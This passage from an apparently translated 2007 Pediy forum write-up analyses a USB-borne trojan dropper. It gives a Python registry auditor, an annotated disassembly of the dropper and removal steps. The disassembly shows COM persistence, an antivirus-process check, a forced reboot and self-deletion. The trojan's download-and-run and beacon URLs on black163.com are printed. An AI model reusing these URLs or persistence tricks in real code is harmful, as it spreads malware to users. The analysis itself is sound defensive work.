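@="C:\\WINDOWS\\Downloaded Program Files\\ZipExt32.dll"
"ThreadingModel"="Both"
"""


def _unescape(data):
    """Undo .reg string quoting; dword:/hex: data is returned as written."""
    if len(data) >= 2 and data[0] == data[-1] == '"':
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return data


def parse_reg(text):
    """Parse .reg text into {key (lower-cased): {value name: data}}; the default value has name ''."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and line.startswith("@="):
            keys[current][""] = _unescape(line[2:])
        elif current is not None and line.startswith('"'):
            name, sep, data = line[1:].partition('"=')
            if sep:
                keys[current][name] = _unescape(data)
    return keys


def inproc_server(keys, clsid):
    """Module registered under CLSID\\{...}\\InprocServer32 (HKCR or HKLM\\SOFTWARE\\Classes), else None."""
    suffix = "\\clsid\\" + clsid.lower() + "\\inprocserver32"
    for key, values in keys.items():
        if key.endswith(suffix):
            return values.get("")
    return None


def in_system32(module):
    """True if the module path resolves into %SystemRoot%\\system32 (assumes %SystemRoot% = C:\\WINDOWS)."""
    path = module.lower().replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")
    return ntpath.dirname(path) == "c:\\windows\\system32"


def audit_ssodl(reg_text):
    """One finding per suspicious SSODL entry: (value name, CLSID, module or None, reasons)."""
    keys = parse_reg(reg_text)
    findings = []
    for name, clsid in keys.get(SSODL_KEY.lower(), {}).items():
        clsid = clsid.upper()
        module = inproc_server(keys, clsid)
        reasons = []
        if clsid not in KNOWN_GOOD_CLSIDS:
            reasons.append("CLSID not in the stock SSODL allow-list")
        if module is None:
            reasons.append("no InprocServer32 registered for this CLSID")
        else:
            if ntpath.basename(module).lower() in IOC_MODULES:
                reasons.append("module name matches a UcHelp IOC")
            if not in_system32(module):
                reasons.append("module lives outside %SystemRoot%\\system32")
        if reasons:
            findings.append((name, clsid, module, reasons))
    return findings


if __name__ == "__main__":
    for name, clsid, module, reasons in audit_ssodl(SAMPLE_REG):
        print(f"{name} {clsid} -> {module}: {'; '.join(reasons)}")
```

Export the SSODL key and HKEY_CLASSES_ROOT\CLSID with `regedit /e` on the suspect machine (the file it writes is UTF-16; decode it before passing the text in), and run the same export from a clean machine through `audit_ssodl` first to confirm the allow-list matches your build.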
=================================================================================================
Step 4: analyze ulinshi32.exe, the behind-the-scenes planner
00401700 /$ 55               PUSH EBP
00401701 |. 8BEC             MOV EBP,ESP
00401703 |. 83E4 F8          AND ESP,FFFFFFF8
00401706 |. 81EC 04020000    SUB ESP,204
0040170C |. 53               PUSH EBX
0040170D |. 56               PUSH ESI
0040170E |. 57               PUSH EDI
0040170F |. 33C0             XOR EAX,EAX
00401711 |. C64424 10 00     MOV BYTE PTR SS:[ESP+10],0
00401716 |. 8B35 94204000    MOV ESI,DWORD PTR DS:[<&kernel32.GetWin>     ; kernel32.GetWindowsDirectoryA
0040171C |. B9 3F000000      MOV ECX,3F
00401721 |. 8D7C24 11        LEA EDI,DWORD PTR SS:[ESP+11]
00401725 |. F3:AB            REP STOS DWORD PTR ES:[EDI]
00401727 |. 66:AB            STOS WORD PTR ES:[EDI]
00401729 |. AA               STOS BYTE PTR ES:[EDI]
0040172A |. 33C0             XOR EAX,EAX
0040172C |. C68424 100100>   MOV BYTE PTR SS:[ESP+110],0
00401734 |. B9 3F000000      MOV ECX,3F
00401739 |. 8DBC24 110100>   LEA EDI,DWORD PTR SS:[ESP+111]
00401740 |. F3:AB            REP STOS DWORD PTR ES:[EDI]
00401742 |. 66:AB            STOS WORD PTR ES:[EDI]
00401744 |. AA               STOS BYTE PTR ES:[EDI]
00401745 |. 68 00010000      PUSH 100                                     ; /BufSize = 100 (256.)
0040174A |. 8D4424 14        LEA EAX,DWORD PTR SS:[ESP+14]                ; |
0040174E |. 50               PUSH EAX                                     ; |Buffer
0040174F |. FFD6             CALL ESI                                     ; \GetWindowsDirectoryA
00401751 |. 8B3D 34204000    MOV EDI,DWORD PTR DS:[<&kernel32.lstrca>     ; kernel32.lstrcatA
00401757 |. 68 78214000      PUSH UnPack_D.00402178                       ; /String2 = "\Downloaded Program Files\ZipExt32.dll"
0040175C |. 8D4C24 14        LEA ECX,DWORD PTR SS:[ESP+14]                ; |
00401760 |. 51               PUSH ECX                                     ; |String1
00401761 |. FFD7             CALL EDI                                     ; \lstrcat
00401763 |. 68 00010000      PUSH 100                                     ; /BufSize = 100 (256.)
00401768 |. 8D9424 140100>   LEA EDX,DWORD PTR SS:[ESP+114]               ; |
0040176F |. 52               PUSH EDX                                     ; |Buffer
00401770 |. FFD6             CALL ESI                                     ; \GetWindowsDirectoryA
00401772 |. 68 10234000      PUSH UnPack_D.00402310                       ; /String2 = "\Downloaded Program Files\Ext32.dat"
00401777 |. 8D8424 140100>   LEA EAX,DWORD PTR SS:[ESP+114]               ; |
0040177E |. 50               PUSH EAX                                     ; |String1
0040177F |. FFD7             CALL EDI                                     ; \lstrcat
00401781 |. 8D8C24 100100>   LEA ECX,DWORD PTR SS:[ESP+110]
00401788 |. 51               PUSH ECX                                     ; /FileName
00401789 |. FF15 68204000    CALL DWORD PTR DS:[<&kernel32.DeleteFil>     ; \DeleteFileA
0040178F |. 8D9424 100100>   LEA EDX,DWORD PTR SS:[ESP+110]               ; deletes C:\windows\Downloaded Program Files\Ext32.dat
00401796 |. 52               PUSH EDX                                     ; /NewName
00401797 |. 8D4424 14        LEA EAX,DWORD PTR SS:[ESP+14]                ; |renames C:\windows\Downloaded Program Files\ZipExt32.dll to C:\windows\Downloaded Program Files\Ext32.dat (the NewName buffer built at 00401772)
0040179B |. 50               PUSH EAX                                     ; |ExistingName
0040179C |. FF15 70204000    CALL DWORD PTR DS:[<&kernel32.MoveFileA>     ; \MoveFileA
004017A2 |. E8 89FCFFFF      CALL UnPack_D.00401430                       ; first deletes the previously generated dll, then drops resource "ceo" to C:\windows\Downloaded Program Files\ZipExt32.dll
004017A7 |. E8 84FEFFFF      CALL UnPack_D.00401630                       ; drops resource "hiv" to c:\tmp.hiv; once it has done its job it is discarded
004017AC |. 8B1D 18204000    MOV EBX,DWORD PTR DS:[<&advapi32.RegCre>     ; advapi32.RegCreateKeyA
004017B2 |. 8D4C24 0C        LEA ECX,DWORD PTR SS:[ESP+C]
004017B6 |. 51               PUSH ECX                                     ; /pHandle
004017B7 |. 68 E0224000      PUSH UnPack_D.004022E0                       ; |Subkey = "CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}"
004017BC |. 68 00000080      PUSH 80000000                                ; |hKey = HKEY_CLASSES_ROOT
004017C1 |. FFD3             CALL EBX                                     ; \RegCreateKeyA
004017C3 |. 8B35 6C204000    MOV ESI,DWORD PTR DS:[<&kernel32.lstrle>     ; creates CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}
004017C9 |. 68 D4224000      PUSH UnPack_D.004022D4                       ; /String = "ZipExt32"
004017CE |. FFD6             CALL ESI                                     ; \lstrlenA
004017D0 |. 8B5424 0C        MOV EDX,DWORD PTR SS:[ESP+C]
004017D4 |. 8B3D 14204000    MOV EDI,DWORD PTR DS:[<&advapi32.RegSet>     ; advapi32.RegSetValueExA
004017DA |. 50               PUSH EAX                                     ; /BufSize
004017DB |. 68 D4224000      PUSH UnPack_D.004022D4                       ; |Buffer = UnPack_D.004022D4
004017E0 |. 6A 01            PUSH 1                                       ; |ValueType = REG_SZ
004017E2 |. 6A 00            PUSH 0                                       ; |Reserved = 0
004017E4 |. 68 D0224000      PUSH UnPack_D.004022D0                       ; |ValueName = ""
004017E9 |. 52               PUSH EDX                                     ; |hKey
004017EA |. FFD7             CALL EDI                                     ; \RegSetValueExA
004017EC |. 8B4424 0C        MOV EAX,DWORD PTR SS:[ESP+C]
004017F0 |. 50               PUSH EAX                                     ; /hKey
004017F1 |. FF15 10204000    CALL DWORD PTR DS:[<&advapi32.RegCloseK>     ; \RegCloseKey
004017F7 |. 8D4C24 0C        LEA ECX,DWORD PTR SS:[ESP+C]
004017FB |. 51               PUSH ECX                                     ; /pHandle
004017FC |. 68 94224000      PUSH UnPack_D.00402294                       ; |Subkey = "CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}\InprocServer32"
00401801 |. 68 00000080      PUSH 80000000                                ; |hKey = HKEY_CLASSES_ROOT
00401806 |. FFD3             CALL EBX                                     ; \RegCreateKeyA
00401808 |. 8D5424 10        LEA EDX,DWORD PTR SS:[ESP+10]                ; below: creates the entries associated with CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140} (InprocServer32 default = path of ZipExt32.dll)
0040180C |. 52               PUSH EDX                                     ; /String
0040180D |. FFD6             CALL ESI                                     ; \lstrlenA
0040180F |. 8B4C24 0C        MOV ECX,DWORD PTR SS:[ESP+C]
00401813 |. 50               PUSH EAX                                     ; /BufSize
00401814 |. 8D4424 14        LEA EAX,DWORD PTR SS:[ESP+14]                ; |
00401818 |. 50               PUSH EAX                                     ; |Buffer
00401819 |. 6A 01            PUSH 1                                       ; |ValueType = REG_SZ
0040181B |. 6A 00            PUSH 0                                       ; |Reserved = 0
0040181D |. 68 D0224000      PUSH UnPack_D.004022D0                       ; |ValueName = ""
00401822 |. 51               PUSH ECX                                     ; |hKey
00401823 |. FFD7             CALL EDI                                     ; \RegSetValueExA
00401825 |. 68 8C224000      PUSH UnPack_D.0040228C                       ; /String = "Both"
0040182A |. FFD6             CALL ESI                                     ; \lstrlenA
0040182C |. 8B5424 0C        MOV EDX,DWORD PTR SS:[ESP+C]
00401830 |. 50               PUSH EAX                                     ; /BufSize
00401831 |. 68 8C224000      PUSH UnPack_D.0040228C                       ; |Buffer = UnPack_D.0040228C
00401836 |. 6A 01            PUSH 1                                       ; |ValueType = REG_SZ
00401838 |. 6A 00            PUSH 0                                       ; |Reserved = 0
0040183A |. 68 7C224000      PUSH UnPack_D.0040227C                       ; |ValueName = "ThreadingModel"
0040183F |. 52               PUSH EDX                                     ; |hKey
00401840 |. FFD7             CALL EDI                                     ; \RegSetValueExA
00401842 |. 8B4424 0C        MOV EAX,DWORD PTR SS:[ESP+C]
00401846 |. 50               PUSH EAX                                     ; /hKey
00401847 |. FF15 10204000    CALL DWORD PTR DS:[<&advapi32.RegCloseK>     ; \RegCloseKey
0040184D |. E8 AEF7FFFF      CALL UnPack_D.00401000                       ; checks whether avp.exe is running
00401852 |. 84C0             TEST AL,AL
00401854 |. 74 2E            JE SHORT UnPack_D.00401884
00401856 |. 8B4D 08          MOV ECX,DWORD PTR SS:[EBP+8]                 ; if it is, then:
00401859 |. 6A 05            PUSH 5                                       ; /ShowState = SW_SHOW
0040185B |. 6A 00            PUSH 0                                       ; |/lParam = 0
0040185D |. 68 F0134000      PUSH UnPack_D.004013F0                       ; ||pDlgProc = UnPack_D.004013F0
00401862 |. 6A 00            PUSH 0                                       ; ||hOwner = NULL
00401864 |. 6A 6C            PUSH 6C                                      ; ||pTemplate = 6C
00401866 |. 51               PUSH ECX                                     ; ||hInst
00401867 |. FF15 E0204000    CALL DWORD PTR DS:[<&user32.CreateDialo>     ; |\CreateDialogParamA
0040186D |. 50               PUSH EAX                                     ; |hWnd
0040186E |. FF15 E4204000    CALL DWORD PTR DS:[<&user32.ShowWindow>>     ; \ShowWindow
00401874 |. E8 F7F7FFFF      CALL UnPack_D.00401070                       ; again uses sysret.dat to reboot the machine
00401879 |. 68 E8030000      PUSH 3E8                                     ; /Timeout = 1000. ms
0040187E |. FF15 2C204000    CALL DWORD PTR DS:[<&kernel32.Sleep>]        ; \Sleep
00401884 |> E8 97F9FFFF      CALL UnPack_D.00401220                       ; loads zipext32.dll into Explorer
00401889 |. E8 62F8FFFF      CALL UnPack_D.004010F0                       ; creates 7ztmp.bat in the temp folder, writes a batch script that deletes this program, and runs it
0040188E |. 5F               POP EDI                                      ; ntdll.7C930738
0040188F |. 5E               POP ESI
00401890 |. 33C0             XOR EAX,EAX
00401892 |. 5B               POP EBX
00401893 |. 8BE5             MOV ESP,EBP
00401895 |. 5D               POP EBP
00401896 \. C2 1000          RETN 10
======================================================================
00401000 /$ 81EC 28010000    SUB ESP,128
00401006 |. 56               PUSH ESI
00401007 |. 57               PUSH EDI
00401008 |. 6A 00            PUSH 0                                       ; /ProcessID = 0
0040100A |. 6A 02            PUSH 2                                       ; |Flags = TH32CS_SNAPPROCESS
0040100C |. E8 95080000      CALL <JMP.&kernel32.CreateToolhelp32S>       ; \CreateToolhelp32Snapshot
00401011 |. 8BF8             MOV EDI,EAX                                  ; take a snapshot of the system's process list
00401013 |. 8D4424 08        LEA EAX,DWORD PTR SS:[ESP+8]
00401017 |. 50               PUSH EAX                                     ; /pProcessentry
00401018 |. 57               PUSH EDI                                     ; |hSnapshot
00401019 |. C74424 10 280>   MOV DWORD PTR SS:[ESP+10],128                ; |dwSize = sizeof(PROCESSENTRY32)
00401021 |. E8 7A080000      CALL <JMP.&kernel32.Process32First>          ; \Process32First
00401026 |. 85C0             TEST EAX,EAX                                 ; walk the process list
00401028 |. 74 28            JE SHORT UnPack_D.00401052
0040102A |. 8B35 A4204000    MOV ESI,DWORD PTR DS:[<&msvcrt._strcm>       ; msvcrt._stricmp
00401030 |> 8D4C24 2C       /LEA ECX,DWORD PTR SS:[ESP+2C]                ; szExeFile of the current entry
00401034 |. 68 1C214000     |PUSH UnPack_D.0040211C                       ; ASCII "avp.exe"
00401039 |. 51              |PUSH ECX
0040103A |. FFD6            |CALL ESI
0040103C |. 83C4 08         |ADD ESP,8
0040103F |. 85C0            |TEST EAX,EAX
00401041 |. 74 1A           |JE SHORT UnPack_D.0040105D
00401043 |. 8D5424 08       |LEA EDX,DWORD PTR SS:[ESP+8]
00401047 |. 52              |PUSH EDX                                     ; /pProcessentry
00401048 |. 57              |PUSH EDI                                     ; |hSnapshot
00401049 |. E8 4C080000     |CALL <JMP.&kernel32.Process32Next>           ; \Process32Next
0040104E |. 85C0            |TEST EAX,EAX
00401050 |.^ 75 DE          \JNZ SHORT UnPack_D.00401030
00401052 |> 5F               POP EDI                                      ; reached the end of the list with no match: returns 0
00401053 |. 32C0             XOR AL,AL
00401055 |. 5E               POP ESI
00401056 |. 81C4 28010000    ADD ESP,128
0040105C |. C3               RETN
0040105D |> 5F               POP EDI                                      ; avp.exe found: returns 1
0040105E |. B0 01            MOV AL,1
00401060 |. 5E               POP ESI
00401061 |. 81C4 28010000    ADD ESP,128
00401067 \. C3               RETN
=================================================================================================
Step 5: ZipExt32.dll, which looks like a trojan
Oh?
Still couldn't be bothered to analyze it in full~
A quick look shows
this dll resembles a trojan downloader
Functions, roughly:
1.
Downloads http://www.black163.com/mm/cfg2.txt to C:\z.ini
--judging by the name, this should be a configuration file
2.
http://www.black163.com/mm/dg1/log.asp?isnew=1&LocalInfo=%s&szHostName=%s&tmp3=tmp3
http://www.black163.com/mm/dg1/log.asp?isnew=0&LocalInfo=%s&szHostName=%s&tmp3=tmp3
LocalInfo= is presumably local machine information
szHostName= the host name?
So roughly it reports the local machine and its parameters to the web
--heh, feels like a trojan controlled over the web~
3.
http://www.black163.com/u319.exe
http://mm.black163.com/u319.exe
No need to think twice: it downloads u319.exe and runs it~
--probably something like a trojan update; and after running, it no doubt wipes up after itself and deletes the leftover files.
4.
wsctny1.exe
wsctny2.exe
wsctny1.tmp
Presumably the names of the files it runs~
One last remark
Despicable, despicable...........
Alexander Roshal
Posing with Alex's signature...
Whatever else you say, there is a trojan in there................
=================================================================================================
Step 6: that's it, the analysis ends here. I would actually very much like to analyze that .sys, but I don't know how yet.
=================================================================================================
Finally, the manual removal procedure:
First, unplug all removable storage devices and boot into Safe Mode. Open every drive via the right-click menu (never by double-clicking, which would fire the autorun.inf Shell command):
1.
Delete the following files if they exist
c:\tmp.hiv
C:\sysret.dat
C:\sysret.sys
system32\AceExt32.dll
windows\Downloaded Program Files\Ext32.dat
windows\Downloaded Program Files\Ext32.dll
windows\Downloaded Program Files\ZipExt32.dll
windows\Downloaded Program Files\CxUSBKey.exe
2.
Clean the registry
Under SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
delete any entry that points to AceExt32.dll or ZipExt32.dll; then delete
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDrop
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}
3.
Turn off autorun
Start > Run > gpedit.msc > Computer Configuration > Administrative Templates > System > Turn off Autoplay > Enabled > All drives > OK~
4.
Plug the removable drive back in, open it via the right-click menu,
and delete the virus files on it (autorun.inf is normally hidden; clear its attributes first, e.g. attrib -r -s -h X:\autorun.inf)
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
Reboot and you should be fine!
BTW:
If you'd rather not go into Safe Mode, you can also forcibly unload the two DLLs AceExt32.dll and ZipExt32.dll from Explorer,
then delete those files and clean up the registry entries; that works too.
--------------------------------------------------------------------------------
【Lessons learned】
1. First time analyzing a virus program; it felt scary, so I even installed a shadow system for it
2. Thanks to 恶灵骑士 MJ0011 for explaining how sysret.sys works
3. Thanks to xyzreg for the forced-registry-write method for getting past HIPS-RD
4. Right, off to cough up blood now~
--------------------------------------------------------------------------------
【Copyright notice】: This article was originally published on the Pediy (看雪) forum; when reposting, credit the author and keep the article intact. Thanks!
2007-06-03 10:20:04 AM